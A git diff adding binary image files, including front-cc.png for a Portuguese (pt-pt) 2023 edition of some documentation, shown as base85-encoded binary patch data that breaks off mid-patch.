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 literal 0 HcmV?d00001 
diff --git a/editions/2023/pt-pt/images/front-cc.png b/editions/2023/pt-pt/images/front-cc.png new file mode 100644 index 0000000000000000000000000000000000000000..45f1398042a7a898c57f00ba6fd279993379926d GIT binary patch literal 5584 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 